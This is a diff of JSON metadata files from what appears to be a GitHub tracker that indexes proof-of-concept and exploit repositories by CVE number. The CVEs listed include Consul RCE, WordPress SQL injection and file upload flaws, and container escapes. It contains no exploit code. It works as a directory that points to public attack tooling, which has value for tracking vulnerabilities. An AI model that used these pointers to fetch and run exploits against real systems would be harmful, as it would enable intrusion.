+ "name": "CVE-2021-41805", + "full_name": "acfirthh\/CVE-2021-41805", + "owner": { + "login": "acfirthh", + "id": 59393271, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59393271?v=4", + "html_url": "https:\/\/github.com\/acfirthh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/acfirthh\/CVE-2021-41805", + "description": "A proof-of-concept for CVE-2021-41805 which is a vulnerability in HashiCorp Consul Enterprise allowing for Remote Code Execution (RCE).", + "fork": false, + "created_at": "2025-01-07T22:45:14Z", + "updated_at": "2025-01-07T23:10:52Z", + "pushed_at": "2025-01-07T23:10:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 } ] \ No newline at end of file diff --git a/2021/CVE-2021-42278.json b/2021/CVE-2021-42278.json index dc99bcfb63..bd5826c711 100644 --- a/2021/CVE-2021-42278.json +++ b/2021/CVE-2021-42278.json @@ -50,10 +50,10 @@ "description": "Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user ", "fork": false, "created_at": "2021-12-13T10:28:12Z", - "updated_at": "2025-01-04T08:46:31Z", + "updated_at": "2025-01-07T19:19:51Z", "pushed_at": "2023-01-29T03:31:27Z", - "stargazers_count": 819, - "watchers_count": 819, + "stargazers_count": 820, + "watchers_count": 820, "has_discussions": false, "forks_count": 124, "allow_forking": true, @@ -62,7 +62,7 @@ "topics": [], "visibility": "public", "forks": 124, - "watchers": 819, + "watchers": 820, "score": 0, "subscribers_count": 13 }, diff --git a/2021/CVE-2021-44228.json b/2021/CVE-2021-44228.json index 0bd5c91c9d..c02fade2b5 100644 --- a/2021/CVE-2021-44228.json +++ b/2021/CVE-2021-44228.json @@ -10741,37 +10741,6 @@ "score": 0, "subscribers_count": 1 }, - { - "id": 448039430, - "name": "Search-log4Jvuln-AppScanSTD", - "full_name": "jrocia\/Search-log4Jvuln-AppScanSTD", - "owner": { - "login": "jrocia", - "id": 69405400, - "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69405400?v=4", - "html_url": "https:\/\/github.com\/jrocia", - "user_view_type": "public" - }, - "html_url": "https:\/\/github.com\/jrocia\/Search-log4Jvuln-AppScanSTD", - "description": "This Pwsh script run AppScan Standard scans against a list of web sites (URLs.txt) checking for Log4J (CVE-2021-44228) vulnerability", - "fork": false, - "created_at": "2022-01-14T16:47:20Z", - "updated_at": "2022-01-14T16:54:21Z", - "pushed_at": "2022-01-14T18:34:31Z", - "stargazers_count": 0, - "watchers_count": 0, - "has_discussions": false, - "forks_count": 1, - "allow_forking": true, - "is_template": false, - "web_commit_signoff_required": false, - "topics": [], - "visibility": "public", - "forks": 1, - "watchers": 0, - "score": 0, - "subscribers_count": 1 - }, { "id": 448612058, "name": "log4stdin", diff --git a/2022/CVE-2022-0155.json b/2022/CVE-2022-0155.json new file mode 100644 index 0000000000..39070f56e0 --- /dev/null +++ b/2022/CVE-2022-0155.json @@ -0,0 +1,33 @@ +[ + { + "id": 830527219, + "name": "CVE-2022-0155-PoC", + "full_name": "coana-tech\/CVE-2022-0155-PoC", + "owner": { + "login": "coana-tech", + "id": 66076970, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66076970?v=4", + "html_url": "https:\/\/github.com\/coana-tech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/coana-tech\/CVE-2022-0155-PoC", + "description": null, + "fork": false, + "created_at": "2024-07-18T12:57:18Z", + "updated_at": "2024-07-18T13:01:28Z", + "pushed_at": "2024-07-18T13:01:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0165.json b/2022/CVE-2022-0165.json new file mode 100644 index 0000000000..801196e9b1 --- /dev/null +++ b/2022/CVE-2022-0165.json @@ -0,0 +1,72 @@ +[ + { + "id": 676524045, + "name": "CVE-2022-0165-EXPLOIT", + "full_name": "K3ysTr0K3R\/CVE-2022-0165-EXPLOIT", + "owner": { + "login": "K3ysTr0K3R", + "id": 70909693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2022-0165-EXPLOIT", + "description": "A PoC exploit for CVE-2022-0165 - Page Builder KingComposer WordPress Plugin - ID Parameter Validation Bypass", + "fork": false, + "created_at": "2023-08-09T11:53:18Z", + "updated_at": "2023-08-09T12:01:12Z", + "pushed_at": "2023-08-09T11:59:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 807412299, + "name": "CVE-2022-0165", + "full_name": "Cappricio-Securities\/CVE-2022-0165", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2022-0165", + "description": "WordPress Page Builder KingComposer <=2.9.6 - Open Redirect", + "fork": false, + "created_at": "2024-05-29T04:00:25Z", + "updated_at": "2024-06-24T09:29:49Z", + "pushed_at": "2024-06-24T09:29:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bugbounty", + "bugbounty-tools", + "cve-2022-0165", + "cve-2022-0165-poc", + "cve-2022-0165-scanner", + "open-redirect", + "wordpress-page-builder-kingcomposer" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0185.json b/2022/CVE-2022-0185.json index 3980483d6a..7a332b6030 100644 --- a/2022/CVE-2022-0185.json +++ b/2022/CVE-2022-0185.json @@ -30,6 +30,68 @@ "score": 0, "subscribers_count": 39 }, + { + "id": 452351785, + "name": "cve-2022-0185-crash-poc", + "full_name": "discordianfish\/cve-2022-0185-crash-poc", + "owner": { + "login": "discordianfish", + "id": 275966, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/275966?v=4", + "html_url": "https:\/\/github.com\/discordianfish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/discordianfish\/cve-2022-0185-crash-poc", + "description": null, + "fork": false, + "created_at": "2022-01-26T16:27:50Z", + "updated_at": "2022-06-21T02:30:36Z", + "pushed_at": "2022-01-26T16:45:45Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 452756684, + "name": "CVE-2022-0185", + "full_name": "khaclep007\/CVE-2022-0185", + "owner": { + "login": "khaclep007", + "id": 45098044, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45098044?v=4", + "html_url": "https:\/\/github.com\/khaclep007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/khaclep007\/CVE-2022-0185", + "description": null, + "fork": false, + "created_at": "2022-01-27T16:24:35Z", + "updated_at": "2022-01-27T16:25:54Z", + "pushed_at": "2022-01-27T16:25:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, { "id": 460788495, "name": "CVE-2022-0185", @@ -122,5 +184,36 @@ "watchers": 3, "score": 0, "subscribers_count": 2 + }, + { + "id": 786640173, + "name": "CVE-2022-0185-Case-Study", + "full_name": "dcheng69\/CVE-2022-0185-Case-Study", + "owner": { + "login": "dcheng69", + "id": 145501807, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145501807?v=4", + "html_url": "https:\/\/github.com\/dcheng69", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dcheng69\/CVE-2022-0185-Case-Study", + "description": null, + "fork": false, + "created_at": "2024-04-15T02:42:43Z", + "updated_at": "2024-05-10T01:22:51Z", + "pushed_at": "2024-05-09T17:07:15Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-0219.json b/2022/CVE-2022-0219.json new file mode 100644 index 0000000000..47788fd5db --- /dev/null +++ b/2022/CVE-2022-0219.json @@ -0,0 +1,33 @@ +[ + { + "id": 450128440, + "name": "CVE-2022-0219", + "full_name": "Haxatron\/CVE-2022-0219", + "owner": { + "login": "Haxatron", + "id": 76475453, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76475453?v=4", + "html_url": "https:\/\/github.com\/Haxatron", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Haxatron\/CVE-2022-0219", + "description": null, + "fork": false, + "created_at": "2022-01-20T14:24:45Z", + "updated_at": "2022-01-20T14:24:45Z", + "pushed_at": "2022-01-20T14:35:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0236.json b/2022/CVE-2022-0236.json new file mode 100644 index 0000000000..5330ab9766 --- /dev/null +++ b/2022/CVE-2022-0236.json @@ -0,0 +1,66 @@ +[ + { + "id": 448514056, + "name": "CVE-2022-0236", + "full_name": "qurbat\/CVE-2022-0236", + "owner": { + "login": "qurbat", + "id": 37518297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37518297?v=4", + "html_url": "https:\/\/github.com\/qurbat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qurbat\/CVE-2022-0236", + "description": "Proof of concept for unauthenticated sensitive data disclosure affecting the wp-import-export WordPress plugin (CVE-2022-0236)", + "fork": false, + "created_at": "2022-01-16T09:52:28Z", + "updated_at": "2023-01-28T03:56:57Z", + "pushed_at": "2022-01-18T17:14:53Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "wordpress-security" + ], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 448893968, + "name": "CVE-2022-0236", + "full_name": "xiska62314\/CVE-2022-0236", + "owner": { + "login": "xiska62314", + "id": 97891523, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97891523?v=4", + "html_url": "https:\/\/github.com\/xiska62314", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xiska62314\/CVE-2022-0236", + "description": "CVE-2022-0236", + "fork": false, + "created_at": "2022-01-17T12:56:19Z", + "updated_at": "2022-01-17T12:56:19Z", + "pushed_at": "2022-01-17T12:56:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0316.json b/2022/CVE-2022-0316.json new file mode 100644 index 0000000000..9b933e368c --- /dev/null +++ b/2022/CVE-2022-0316.json @@ -0,0 +1,42 @@ +[ + { + "id": 599217584, + "name": "CVE-2022-0316_wordpress_multiple_themes_exploit", + "full_name": "KTN1990\/CVE-2022-0316_wordpress_multiple_themes_exploit", + "owner": { + "login": "KTN1990", + "id": 33407405, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33407405?v=4", + "html_url": "https:\/\/github.com\/KTN1990", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KTN1990\/CVE-2022-0316_wordpress_multiple_themes_exploit", + "description": "( Wordpress Exploit ) Wordpress Multiple themes - Unauthenticated Arbitrary File Upload", + "fork": false, + "created_at": "2023-02-08T17:37:09Z", + "updated_at": "2024-09-05T09:11:44Z", + "pushed_at": "2023-02-09T15:59:30Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bot", + "botnet", + "exploit", + "hack", + "hacking", + "pentest", + "pentest-tool", + "shell" + ], + "visibility": "public", + "forks": 5, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0332.json b/2022/CVE-2022-0332.json new file mode 100644 index 0000000000..303a00cb76 --- /dev/null +++ b/2022/CVE-2022-0332.json @@ -0,0 +1,33 @@ +[ + { + "id": 452082369, + "name": "CVE-2022-0332", + "full_name": "numanturle\/CVE-2022-0332", + "owner": { + "login": "numanturle", + "id": 7007951, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7007951?v=4", + "html_url": "https:\/\/github.com\/numanturle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/numanturle\/CVE-2022-0332", + "description": null, + "fork": false, + "created_at": "2022-01-25T23:58:17Z", + "updated_at": "2024-08-12T20:20:04Z", + "pushed_at": "2022-01-26T00:18:26Z", + "stargazers_count": 44, + "watchers_count": 44, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 44, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0337.json b/2022/CVE-2022-0337.json index e0d8e38e3c..293e415c2b 100644 --- a/2022/CVE-2022-0337.json +++ b/2022/CVE-2022-0337.json @@ -45,5 +45,67 @@ "watchers": 328, "score": 0, "subscribers_count": 6 + }, + { + "id": 608127887, + "name": "ChExp-CVE-2022-0337-", + "full_name": "maldev866\/ChExp-CVE-2022-0337-", + "owner": { + "login": "maldev866", + "id": 118355132, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118355132?v=4", + "html_url": "https:\/\/github.com\/maldev866", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/maldev866\/ChExp-CVE-2022-0337-", + "description": null, + "fork": false, + "created_at": "2023-03-01T11:31:45Z", + "updated_at": "2023-03-01T11:33:31Z", + "pushed_at": "2023-03-01T11:33:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 721416376, + "name": "CVE-2022-0337-RePoC", + "full_name": "zer0ne1\/CVE-2022-0337-RePoC", + "owner": { + "login": "zer0ne1", + "id": 71746399, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71746399?v=4", + "html_url": "https:\/\/github.com\/zer0ne1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zer0ne1\/CVE-2022-0337-RePoC", + "description": null, + "fork": false, + "created_at": "2023-11-21T02:34:32Z", + "updated_at": "2023-11-21T02:36:09Z", + "pushed_at": "2023-12-12T02:42:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-0412.json b/2022/CVE-2022-0412.json new file mode 100644 index 0000000000..c80614f384 --- /dev/null +++ b/2022/CVE-2022-0412.json @@ -0,0 +1,38 @@ +[ + { + "id": 683124631, + "name": "CVE-2022-0412_Exploit", + "full_name": "TcherB31\/CVE-2022-0412_Exploit", + "owner": { + "login": "TcherB31", + "id": 108927927, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108927927?v=4", + "html_url": "https:\/\/github.com\/TcherB31", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TcherB31\/CVE-2022-0412_Exploit", + "description": "I'm write a exploit&scan for exploitation SQL Injection in WP from CVE-2022-0412", + "fork": false, + "created_at": "2023-08-25T16:54:28Z", + "updated_at": "2024-11-02T10:19:04Z", + "pushed_at": "2023-08-25T16:56:38Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "poc", + "sqlinjection", + "wordpess" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0435.json b/2022/CVE-2022-0435.json new file mode 100644 index 0000000000..5eb9ba25a8 --- /dev/null +++ b/2022/CVE-2022-0435.json @@ -0,0 +1,33 @@ +[ + { + "id": 630581068, + "name": "CVE-2022-0435", + "full_name": "wlswotmd\/CVE-2022-0435", + "owner": { + "login": "wlswotmd", + "id": 80761172, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80761172?v=4", + "html_url": "https:\/\/github.com\/wlswotmd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wlswotmd\/CVE-2022-0435", + "description": null, + "fork": false, + "created_at": "2023-04-20T17:29:02Z", + "updated_at": "2023-07-03T13:45:44Z", + "pushed_at": "2023-04-26T09:45:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0439.json b/2022/CVE-2022-0439.json new file mode 100644 index 0000000000..98c9265cc3 --- /dev/null +++ b/2022/CVE-2022-0439.json @@ -0,0 +1,33 @@ +[ + { + "id": 651257016, + "name": "CVE-2022-0439", + "full_name": "RandomRobbieBF\/CVE-2022-0439", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2022-0439", + "description": "CVE-2022-0439 - Email Subscribers & Newsletters < 5.3.2 - Subscriber+ Blind SQL injection", + "fork": false, + "created_at": "2023-06-08T21:20:22Z", + "updated_at": "2023-06-09T07:40:58Z", + "pushed_at": "2023-06-08T21:26:58Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-0441.json b/2022/CVE-2022-0441.json index 394ca91b0a..ce279caefc 100644 --- a/2022/CVE-2022-0441.json +++ b/2022/CVE-2022-0441.json @@ -35,5 +35,102 @@ "watchers": 6, "score": 0, "subscribers_count": 0 + }, + { + "id": 567613523, + "name": "cve-2022-0441", + "full_name": "SDragon1205\/cve-2022-0441", + "owner": { + "login": "SDragon1205", + "id": 80585189, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80585189?v=4", + "html_url": "https:\/\/github.com\/SDragon1205", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SDragon1205\/cve-2022-0441", + "description": "CVE-2022-0441 - MasterStudy LMS 2.7.6", + "fork": false, + "created_at": "2022-11-18T07:02:29Z", + "updated_at": "2022-11-20T12:52:35Z", + "pushed_at": "2022-11-18T07:07:14Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 648445645, + "name": "CVE-2022-0441", + "full_name": "tegal1337\/CVE-2022-0441", + "owner": { + "login": "tegal1337", + "id": 58784189, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58784189?v=4", + "html_url": "https:\/\/github.com\/tegal1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tegal1337\/CVE-2022-0441", + "description": "The MasterStudy LMS WordPress plugin before 2.7.6 does to validate some parameters given when registering a new account, allowing unauthenticated users to register as an admin", + "fork": false, + "created_at": "2023-06-02T01:53:32Z", + "updated_at": "2024-08-12T20:31:34Z", + "pushed_at": "2023-06-02T02:24:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-0441", + "wordpress-exploit", + "wordpress-plugin" + ], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 699704500, + "name": "CVE-2022-0441", + "full_name": "kyukazamiqq\/CVE-2022-0441", + "owner": { + "login": "kyukazamiqq", + "id": 55656379, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55656379?v=4", + "html_url": "https:\/\/github.com\/kyukazamiqq", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kyukazamiqq\/CVE-2022-0441", + "description": "Checker for CVE-2022-0441", + "fork": false, + "created_at": "2023-10-03T07:07:40Z", + "updated_at": "2023-10-03T07:09:30Z", + "pushed_at": "2023-10-03T07:09:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-0482.json b/2022/CVE-2022-0482.json index e4148f8cc1..3bca6fcc37 100644 --- a/2022/CVE-2022-0482.json +++ b/2022/CVE-2022-0482.json @@ -35,5 +35,36 @@ "watchers": 3, "score": 0, "subscribers_count": 2 + }, + { + "id": 790152234, + "name": "CVE-2022-0482_exploit", + "full_name": "mija-pilkaite\/CVE-2022-0482_exploit", + "owner": { + "login": "mija-pilkaite", + "id": 115141099, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115141099?v=4", + "html_url": "https:\/\/github.com\/mija-pilkaite", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mija-pilkaite\/CVE-2022-0482_exploit", + "description": "A final project for \"Network Security\" class at NYCU (National Yang Ming Chiao Tung University, Taiwan). Exploiting a CVE in \"EasyAppointments\" software. ", + "fork": false, + "created_at": "2024-04-22T11:10:33Z", + "updated_at": "2024-05-11T09:48:18Z", + "pushed_at": "2024-04-22T12:09:00Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 } ] \ No newline at end of file diff --git a/2022/CVE-2022-0492.json b/2022/CVE-2022-0492.json index b478066faf..cfd683dab0 100644 --- a/2022/CVE-2022-0492.json +++ b/2022/CVE-2022-0492.json @@ -1,4 +1,128 @@ [ + { + "id": 464299568, + "name": "can-ctr-escape-cve-2022-0492", + "full_name": "PaloAltoNetworks\/can-ctr-escape-cve-2022-0492", + "owner": { + "login": "PaloAltoNetworks", + "id": 4855743, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4855743?v=4", + "html_url": "https:\/\/github.com\/PaloAltoNetworks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PaloAltoNetworks\/can-ctr-escape-cve-2022-0492", + "description": "Test whether a container environment is vulnerable to container escapes via CVE-2022-0492", + "fork": false, + "created_at": "2022-02-28T01:25:26Z", + "updated_at": "2024-11-05T04:01:34Z", + "pushed_at": "2022-03-09T00:09:46Z", + "stargazers_count": 47, + "watchers_count": 47, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 17, + "watchers": 47, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 466710055, + "name": "CVE-2022-0492-Checker", + "full_name": "SofianeHamlaoui\/CVE-2022-0492-Checker", + "owner": { + "login": "SofianeHamlaoui", + "id": 16967174, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16967174?v=4", + "html_url": "https:\/\/github.com\/SofianeHamlaoui", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SofianeHamlaoui\/CVE-2022-0492-Checker", + "description": "A script to check if a container environment is vulnerable to container escapes via CVE-2022-0492", + "fork": false, + "created_at": "2022-03-06T10:57:09Z", + "updated_at": "2024-08-12T20:21:17Z", + "pushed_at": "2022-03-12T13:45:32Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 9, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 468660841, + "name": "CVE-2022-0492", + "full_name": "chenaotian\/CVE-2022-0492", + "owner": { + "login": "chenaotian", + "id": 86546351, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86546351?v=4", + "html_url": "https:\/\/github.com\/chenaotian", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chenaotian\/CVE-2022-0492", + "description": "CVE-2022-0492 EXP and Analysis write up", + "fork": false, + "created_at": "2022-03-11T08:02:46Z", + "updated_at": "2024-08-12T20:21:27Z", + "pushed_at": "2022-03-11T09:33:24Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 28, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 471620496, + "name": "CVE-2022-0492", + "full_name": "bb33bb\/CVE-2022-0492", + "owner": { + "login": "bb33bb", + "id": 5463104, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5463104?v=4", + "html_url": "https:\/\/github.com\/bb33bb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bb33bb\/CVE-2022-0492", + "description": null, + "fork": false, + "created_at": "2022-03-19T07:13:56Z", + "updated_at": "2023-12-23T11:27:56Z", + "pushed_at": "2022-03-07T10:03:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, { "id": 490291933, "name": "device_renesas_kernel_AOSP10_r33_CVE-2022-0492", @@ -29,5 +153,74 @@ "watchers": 0, "score": 0, "subscribers_count": 1 + }, + { + "id": 529476500, + "name": "CVE-2022-0492-Container-Escape", + "full_name": "yoeelingBin\/CVE-2022-0492-Container-Escape", + "owner": { + "login": "yoeelingBin", + "id": 57822313, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57822313?v=4", + "html_url": "https:\/\/github.com\/yoeelingBin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yoeelingBin\/CVE-2022-0492-Container-Escape", + "description": "CVE-2022-0492-Container-Escape", + "fork": false, + "created_at": "2022-08-27T04:02:24Z", + "updated_at": "2022-09-16T14:15:14Z", + "pushed_at": "2022-08-28T08:19:56Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 603301567, + "name": "CVE-2022-0492-Docker-Breakout-Checker-and-PoC", + "full_name": "T1erno\/CVE-2022-0492-Docker-Breakout-Checker-and-PoC", + "owner": { + "login": "T1erno", + "id": 78065668, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78065668?v=4", + "html_url": "https:\/\/github.com\/T1erno", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/T1erno\/CVE-2022-0492-Docker-Breakout-Checker-and-PoC", + "description": "Docker Breakout Checker and PoC via CAP_SYS_ADMIN and via user namespaces (CVE-2022-0492)", + "fork": false, + "created_at": "2023-02-18T04:48:25Z", + "updated_at": "2024-12-07T15:11:22Z", + "pushed_at": "2023-02-18T05:28:02Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-0492", + "docker-breakout", + "hacking", + "pentesting", + "privesc" + ], + "visibility": "public", + 